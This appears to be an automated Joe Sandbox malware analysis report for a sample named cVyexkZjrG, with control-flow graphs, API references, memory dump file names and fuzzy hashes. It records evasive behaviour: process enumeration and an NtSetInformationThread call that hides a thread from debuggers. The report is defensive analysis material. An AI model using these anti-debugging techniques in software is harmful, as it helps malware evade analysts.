                            • Opcode ID: 4f011b7d5e9bf1db19e995405cd39c99a5743e0972f77b045ea1974b5d97494f
                            • Instruction ID: 89e52c12fa2f17db4263026c0277d83fcd2190644a96e119fe476d8b95d417ce
                            • Opcode Fuzzy Hash: 4f011b7d5e9bf1db19e995405cd39c99a5743e0972f77b045ea1974b5d97494f
                            • Instruction Fuzzy Hash: 69741771645B028FC728CF28C8D0695B7F3EF8531871E8A6DC0968BB55EB74B58ACB50
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: }jk$;T55$L@^
                            • API String ID: 0-4218709813
                            • Opcode ID: 7df05eca72bf5a61b96671750ebad901b98cde00ab5e4c10d0aad3184a6484c3
                            • Instruction ID: 1486761de2dfdd98553987b207497d603c99493515637e483efb089ce3636106
                            • Opcode Fuzzy Hash: 7df05eca72bf5a61b96671750ebad901b98cde00ab5e4c10d0aad3184a6484c3
                            • Instruction Fuzzy Hash: 0434F6716457018FC728CF28C8D0A95B7F3EF89318B1D8A6DC0968BB55E774B58ADB80

                            Control-flow Graph

                            control_flow_graph 7677 6cc55240-6cc55275 CreateToolhelp32Snapshot 7678 6cc552a0-6cc552a9 7677->7678 7679 6cc552e0-6cc552e5 7678->7679 7680 6cc552ab-6cc552b0 7678->7680 7683 6cc55377-6cc553a1 call 6cc62c05 7679->7683 7684 6cc552eb-6cc552f0 7679->7684 7681 6cc55315-6cc5531a 7680->7681 7682 6cc552b2-6cc552b7 7680->7682 7690 6cc553a6-6cc553ab 7681->7690 7691 6cc55320-6cc55332 Process32NextW 7681->7691 7686 6cc55334-6cc5535d call 6cc5b920 Process32FirstW 7682->7686 7687 6cc552b9-6cc552be 7682->7687 7683->7678 7688 6cc55277-6cc55292 CloseHandle 7684->7688 7689 6cc552f2-6cc552f7 7684->7689 7697 6cc55362-6cc55372 7686->7697 7687->7678 7695 6cc552c0-6cc552d1 7687->7695 7688->7678 7689->7678 7696 6cc552f9-6cc55313 7689->7696 7690->7678 7694 6cc553b1-6cc553bf 7690->7694 7691->7697 7695->7678 7696->7678 7697->7678
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CC5524E
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: CreateSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3332741929-0
                            • Opcode ID: 54456ef312bf471d70e57afd9238963c6c7ea72a82e48c5f30afc27ae85fd2d5
                            • Instruction ID: 93620b00fb95452a9160569b0bd1c67403813fb25199002ac11a949fadb81101
                            • Opcode Fuzzy Hash: 54456ef312bf471d70e57afd9238963c6c7ea72a82e48c5f30afc27ae85fd2d5
                            • Instruction Fuzzy Hash: 17314D78608300AFD7109F29CC88B0ABBF4FF95754F91492DE598C7360E3B1A8688B57

                            Control-flow Graph

                            control_flow_graph 7821 6cad3886-6cad388e 7822 6cad3894-6cad3896 7821->7822 7823 6cad3970-6cad397d 7821->7823 7822->7823 7826 6cad389c-6cad38b9 7822->7826 7824 6cad397f-6cad3989 7823->7824 7825 6cad39f1-6cad39f8 7823->7825 7824->7826 7827 6cad398f-6cad3994 7824->7827 7828 6cad39fe-6cad3a03 7825->7828 7829 6cad3ab5-6cad3aba 7825->7829 7830 6cad38c0-6cad38c1 7826->7830 7831 6cad399a-6cad399f 7827->7831 7832 6cad3b16-6cad3b18 7827->7832 7833 6cad3a09-6cad3a2f 7828->7833 7834 6cad38d2-6cad38d4 7828->7834 7829->7826 7836 6cad3ac0-6cad3ac7 7829->7836 7835 6cad395e 7830->7835 7837 6cad383b-6cad3855 call 6cc21470 call 6cc21480 7831->7837 7838 6cad39a5-6cad39bf 7831->7838 7832->7830 7839 6cad38f8-6cad3955 7833->7839 7840 6cad3a35-6cad3a3a 7833->7840 7841 6cad3957-6cad395c 7834->7841 7842 6cad3960-6cad3964 7835->7842 7836->7830 7843 6cad3acd-6cad3ad6 7836->7843 7850 6cad3860-6cad3885 7837->7850 7845 6cad3a5a-6cad3a5d 7838->7845 7839->7841 7846 6cad3b1d-6cad3b22 7840->7846 7847 6cad3a40-6cad3a57 7840->7847 7841->7835 7849 6cad396a 7842->7849 7842->7850 7843->7832 7844 6cad3ad8-6cad3aeb 7843->7844 7844->7839 7852 6cad3af1-6cad3af8 7844->7852 7856 6cad3aa9-6cad3ab0 7845->7856 7854 6cad3b49-6cad3b50 7846->7854 7855 6cad3b24-6cad3b44 7846->7855 7847->7845 7851 6cad3ba1-6cad3bb6 7849->7851 7850->7821 7864 6cad3bc0-6cad3bda call 6cc21470 call 6cc21480 7851->7864 7859 6cad3afa-6cad3aff 7852->7859 7860 6cad3b62-6cad3b85 7852->7860 7854->7830 7863 6cad3b56-6cad3b5d 7854->7863 7855->7856 7856->7842 7859->7841 7860->7839 7867 6cad3b8b 7860->7867 7863->7842 7872 6cad3be0-6cad3bfe 7864->7872 7867->7851 7875 6cad3e7b 7872->7875 7876 6cad3c04-6cad3c11 7872->7876 7879 6cad3e81-6cad3ee0 call 6cad3750 GetCurrentThread NtSetInformationThread 7875->7879 7877 6cad3c17-6cad3c20 7876->7877 7878 6cad3ce0-6cad3cea 7876->7878 7880 6cad3dc5 7877->7880 7881 6cad3c26-6cad3c2d 7877->7881 7882 6cad3cec-6cad3d0c 7878->7882 7883 6cad3d3a-6cad3d3c 7878->7883 7892 6cad3eea-6cad3f04 
call 6cc21470 call 6cc21480 7879->7892 7888 6cad3dc6 7880->7888 7886 6cad3dc3 7881->7886 7887 6cad3c33-6cad3c3a 7881->7887 7889 6cad3d90-6cad3d95 7882->7889 7890 6cad3d3e-6cad3d45 7883->7890 7891 6cad3d70-6cad3d8d 7883->7891 7886->7880 7895 6cad3e26-6cad3e2b 7887->7895 7896 6cad3c40-6cad3c5b 7887->7896 7897 6cad3dc8-6cad3dcc 7888->7897 7893 6cad3dba-6cad3dc1 7889->7893 7894 6cad3d97-6cad3db8 7889->7894 7898 6cad3d50-6cad3d57 7890->7898 7891->7889 7915 6cad3f75-6cad3fa1 7892->7915 7893->7886 7900 6cad3dd7-6cad3ddc 7893->7900 7894->7880 7901 6cad3c7b-6cad3cd0 7895->7901 7902 6cad3e31 7895->7902 7903 6cad3e1b-6cad3e24 7896->7903 7897->7872 7904 6cad3dd2 7897->7904 7898->7888 7907 6cad3dde-6cad3e17 7900->7907 7908 6cad3e36-6cad3e3d 7900->7908 7901->7898 7902->7864 7903->7897 7905 6cad3e76-6cad3e79 7903->7905 7904->7905 7905->7879 7907->7903 7911 6cad3e5c-6cad3e5f 7908->7911 7912 6cad3e3f-6cad3e5a 7908->7912 7911->7901 7914 6cad3e65-6cad3e69 7911->7914 7912->7903 7914->7897 7914->7905 7919 6cad4020-6cad4026 7915->7919 7920 6cad3fa3-6cad3fa8 7915->7920 7921 6cad402c-6cad403c 7919->7921 7922 6cad3f06-6cad3f35 7919->7922 7923 6cad407c-6cad4081 7920->7923 7924 6cad3fae-6cad3fcf 7920->7924 7926 6cad403e-6cad4058 7921->7926 7927 6cad40b3-6cad40b8 7921->7927 7925 6cad3f38-6cad3f61 7922->7925 7928 6cad40aa-6cad40ae 7923->7928 7929 6cad4083-6cad408a 7923->7929 7924->7928 7930 6cad3f64-6cad3f67 7925->7930 7931 6cad405a-6cad4063 7926->7931 7927->7924 7933 6cad40be-6cad40c9 7927->7933 7934 6cad3f6b-6cad3f6f 7928->7934 7929->7925 7932 6cad4090 7929->7932 7935 6cad3f69 7930->7935 7936 6cad4069-6cad406c 7931->7936 7937 6cad40f5-6cad413f 7931->7937 7932->7892 7938 6cad40a7 7932->7938 7933->7928 7939 6cad40cb-6cad40d4 7933->7939 7934->7915 7935->7934 7941 6cad4144-6cad414b 7936->7941 7942 6cad4072-6cad4077 7936->7942 7937->7935 7938->7928 7939->7938 7943 6cad40d6-6cad40f0 7939->7943 7941->7934 7942->7930 7943->7931
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3edede1f9e17652031a0a9776104b19d93e1d9e9e21915b503ca39efd2dbdaaa
                            • Instruction ID: 39e047a25c8babb2caa7b95a91098332f79d0687d1d9908a4200002c4acd1a64
                            • Opcode Fuzzy Hash: 3edede1f9e17652031a0a9776104b19d93e1d9e9e21915b503ca39efd2dbdaaa
                            • Instruction Fuzzy Hash: 3532B232246B018FC324CF28C890695B7F3EFD531476E8A6DC0EA5BA95D775B48ACB50

                            Control-flow Graph

                            control_flow_graph 7969 6cad3a6a-6cad3a85 7970 6cad3a87-6cad3aa7 7969->7970 7971 6cad3aa9-6cad3ab0 7970->7971 7972 6cad3960-6cad3964 7971->7972 7973 6cad396a 7972->7973 7974 6cad3860-6cad388e 7972->7974 7975 6cad3ba1-6cad3bb6 7973->7975 7983 6cad3894-6cad3896 7974->7983 7984 6cad3970-6cad397d 7974->7984 7978 6cad3bc0-6cad3bda call 6cc21470 call 6cc21480 7975->7978 7990 6cad3be0-6cad3bfe 7978->7990 7983->7984 7989 6cad389c-6cad38b9 7983->7989 7987 6cad397f-6cad3989 7984->7987 7988 6cad39f1-6cad39f8 7984->7988 7987->7989 7991 6cad398f-6cad3994 7987->7991 7992 6cad39fe-6cad3a03 7988->7992 7993 6cad3ab5-6cad3aba 7988->7993 7994 6cad38c0-6cad38c1 7989->7994 8010 6cad3e7b 7990->8010 8011 6cad3c04-6cad3c11 7990->8011 7996 6cad399a-6cad399f 7991->7996 7997 6cad3b16-6cad3b18 7991->7997 7998 6cad3a09-6cad3a2f 7992->7998 7999 6cad38d2-6cad38d4 7992->7999 7993->7989 8001 6cad3ac0-6cad3ac7 7993->8001 8000 6cad395e 7994->8000 8003 6cad383b-6cad3855 call 6cc21470 call 6cc21480 7996->8003 8004 6cad39a5-6cad39bf 7996->8004 7997->7994 8005 6cad38f8-6cad3955 7998->8005 8006 6cad3a35-6cad3a3a 7998->8006 8007 6cad3957-6cad395c 7999->8007 8000->7972 8001->7994 8008 6cad3acd-6cad3ad6 8001->8008 8003->7974 8012 6cad3a5a-6cad3a5d 8004->8012 8005->8007 8013 6cad3b1d-6cad3b22 8006->8013 8014 6cad3a40-6cad3a57 8006->8014 8007->8000 8008->7997 8009 6cad3ad8-6cad3aeb 8008->8009 8009->8005 8016 6cad3af1-6cad3af8 8009->8016 8021 6cad3e81-6cad3ee0 call 6cad3750 GetCurrentThread NtSetInformationThread 8010->8021 8017 6cad3c17-6cad3c20 8011->8017 8018 6cad3ce0-6cad3cea 8011->8018 8012->7971 8019 6cad3b49-6cad3b50 8013->8019 8020 6cad3b24-6cad3b44 8013->8020 8014->8012 8024 6cad3afa-6cad3aff 8016->8024 8025 6cad3b62-6cad3b85 8016->8025 8026 6cad3dc5 8017->8026 8027 6cad3c26-6cad3c2d 8017->8027 8029 6cad3cec-6cad3d0c 8018->8029 8030 6cad3d3a-6cad3d3c 8018->8030 8019->7994 8028 6cad3b56-6cad3b5d 8019->8028 8020->7970 8041 6cad3eea-6cad3f04 call 6cc21470 call 6cc21480 
8021->8041 8024->8007 8025->8005 8036 6cad3b8b 8025->8036 8037 6cad3dc6 8026->8037 8034 6cad3dc3 8027->8034 8035 6cad3c33-6cad3c3a 8027->8035 8028->7972 8038 6cad3d90-6cad3d95 8029->8038 8039 6cad3d3e-6cad3d45 8030->8039 8040 6cad3d70-6cad3d8d 8030->8040 8034->8026 8044 6cad3e26-6cad3e2b 8035->8044 8045 6cad3c40-6cad3c5b 8035->8045 8036->7975 8046 6cad3dc8-6cad3dcc 8037->8046 8042 6cad3dba-6cad3dc1 8038->8042 8043 6cad3d97-6cad3db8 8038->8043 8047 6cad3d50-6cad3d57 8039->8047 8040->8038 8064 6cad3f75-6cad3fa1 8041->8064 8042->8034 8049 6cad3dd7-6cad3ddc 8042->8049 8043->8026 8050 6cad3c7b-6cad3cd0 8044->8050 8051 6cad3e31 8044->8051 8052 6cad3e1b-6cad3e24 8045->8052 8046->7990 8053 6cad3dd2 8046->8053 8047->8037 8056 6cad3dde-6cad3e17 8049->8056 8057 6cad3e36-6cad3e3d 8049->8057 8050->8047 8051->7978 8052->8046 8054 6cad3e76-6cad3e79 8052->8054 8053->8054 8054->8021 8056->8052 8060 6cad3e5c-6cad3e5f 8057->8060 8061 6cad3e3f-6cad3e5a 8057->8061 8060->8050 8063 6cad3e65-6cad3e69 8060->8063 8061->8052 8063->8046 8063->8054 8068 6cad4020-6cad4026 8064->8068 8069 6cad3fa3-6cad3fa8 8064->8069 8070 6cad402c-6cad403c 8068->8070 8071 6cad3f06-6cad3f35 8068->8071 8072 6cad407c-6cad4081 8069->8072 8073 6cad3fae-6cad3fcf 8069->8073 8075 6cad403e-6cad4058 8070->8075 8076 6cad40b3-6cad40b8 8070->8076 8074 6cad3f38-6cad3f61 8071->8074 8077 6cad40aa-6cad40ae 8072->8077 8078 6cad4083-6cad408a 8072->8078 8073->8077 8079 6cad3f64-6cad3f67 8074->8079 8080 6cad405a-6cad4063 8075->8080 8076->8073 8082 6cad40be-6cad40c9 8076->8082 8083 6cad3f6b-6cad3f6f 8077->8083 8078->8074 8081 6cad4090 8078->8081 8084 6cad3f69 8079->8084 8085 6cad4069-6cad406c 8080->8085 8086 6cad40f5-6cad413f 8080->8086 8081->8041 8087 6cad40a7 8081->8087 8082->8077 8088 6cad40cb-6cad40d4 8082->8088 8083->8064 8084->8083 8090 6cad4144-6cad414b 8085->8090 8091 6cad4072-6cad4077 8085->8091 8086->8084 8087->8077 8088->8087 8092 6cad40d6-6cad40f0 8088->8092 8090->8083 8091->8079 8092->8080
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: e6ee8ce25816146f657a4c9cd42960045a550f46aa7acb9168a371461b05d8a3
                            • Instruction ID: 904e1d14ffbac96631b3635f80b97d35d4257bb6712408b24b0ae2c8c9f65c52
                            • Opcode Fuzzy Hash: e6ee8ce25816146f657a4c9cd42960045a550f46aa7acb9168a371461b05d8a3
                            • Instruction Fuzzy Hash: E251F1312067018FC320CF29C880795B7F3BF96314F6A8A1DC0EA1BA95DB75B48A8B41
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 3df567c2f41b5bc736ea78bfea0d32740a303d9ba212f1b279d20c85e8c05388
                            • Instruction ID: a0110e8cb4ce533a27e8e5ff8b8ebd0ecc10cbc404c4991d475e33995feb06d2
                            • Opcode Fuzzy Hash: 3df567c2f41b5bc736ea78bfea0d32740a303d9ba212f1b279d20c85e8c05388
                            • Instruction Fuzzy Hash: B551B171106B018FC320CF29C480795B7F3BF96314F6A8B5DC0E65BA95DB75B48A8B91
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 3b75eef3b94b341b60d8681545772f7e66123549641423d7f6e918c26af51b3e
                            • Instruction ID: 784c0950dd5aff4f5050fef9b2b44ff865f6615f436b5e5ff7198ae5d959b195
                            • Opcode Fuzzy Hash: 3b75eef3b94b341b60d8681545772f7e66123549641423d7f6e918c26af51b3e
                            • Instruction Fuzzy Hash: 0131F431246B018FD320CF28C8847C6B7B3BF96314F6A4E1DC0E65BA95DB7974899B51
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: ae735c6a44565f6ace8d09982c62ad697aa8eb1ab4f62100fd098e94996edb2e
                            • Instruction ID: c637544a3079c8e3785592db6f36986e6af9aefb4f1c66172b2307674b55c9a2
                            • Opcode Fuzzy Hash: ae735c6a44565f6ace8d09982c62ad697aa8eb1ab4f62100fd098e94996edb2e
                            • Instruction Fuzzy Hash: 4A31D131105B018BD724CF28C490796B7B6BF96304F6A4E1DC0EA5BA85DB757489CB52
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6CAD3E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CAD3EAA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: ab166a787cd6905407f83dcabf994d0815043315b7e4bf4c157715366df8c111
                            • Instruction ID: d5559aa2033020262841fb1cd4a4f5081011143d227c8de3dc873339ad711a8d
                            • Opcode Fuzzy Hash: ab166a787cd6905407f83dcabf994d0815043315b7e4bf4c157715366df8c111
                            • Instruction Fuzzy Hash: C72106702197028BD324CF28C89079677B6BF46304F5A4E1DD0E69BAD4DB75B4898B52
                            APIs
                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC55130
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ManagerOpen
                            • String ID:
                            • API String ID: 1889721586-0
                            • Opcode ID: b22c26cd67168d736a8e6ac87823bd5900f895f4e680ce2b64f1b54165d0dd2d
                            • Instruction ID: 308a43dc430a5e52b453cbf742fcde67d9bfdf241443d871339a8aad86eb2617
                            • Opcode Fuzzy Hash: b22c26cd67168d736a8e6ac87823bd5900f895f4e680ce2b64f1b54165d0dd2d
                            • Instruction Fuzzy Hash: D03145B4608301EFC7108F29C584B4BBFF0BB89764F90895AF988C6360D331D8689B67
                            APIs
                            • FindFirstFileA.KERNEL32(?,?), ref: 6CC4AEDC
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID:
                            • API String ID: 1974802433-0
                            • Opcode ID: 2fb598d5b363230da044b7ff4b26072ec0b73a1df12faaa9e3b7f14c1d546db0
                            • Instruction ID: 982a7148b7169c0573e7d8bebb8b243c9860660beb2c3e546c639f3114bfe660
                            • Opcode Fuzzy Hash: 2fb598d5b363230da044b7ff4b26072ec0b73a1df12faaa9e3b7f14c1d546db0
                            • Instruction Fuzzy Hash: 111136B4508351AFE7108F29D54491EBBE4BFC6314F14CE69F4A8CB691E330CC858B22
                            APIs
                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CC2ABA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                            • API String ID: 2738559852-1563143607
                            • Opcode ID: 540fff6ec76e3ce6fc592a90936f2a935c6a69bfe1becb13eeb4e1d11b32c03c
                            • Instruction ID: 5f5d3232215e7873e3024ebdd922f8c45fa8327fe64bc1769490f90ab70ac6a3
                            • Opcode Fuzzy Hash: 540fff6ec76e3ce6fc592a90936f2a935c6a69bfe1becb13eeb4e1d11b32c03c
                            • Instruction Fuzzy Hash: 5762487060D3818FC724CF29C490A5ABBE2ABD9314F248D5EE99ACB751E739D845CB43

                            Control-flow Graph

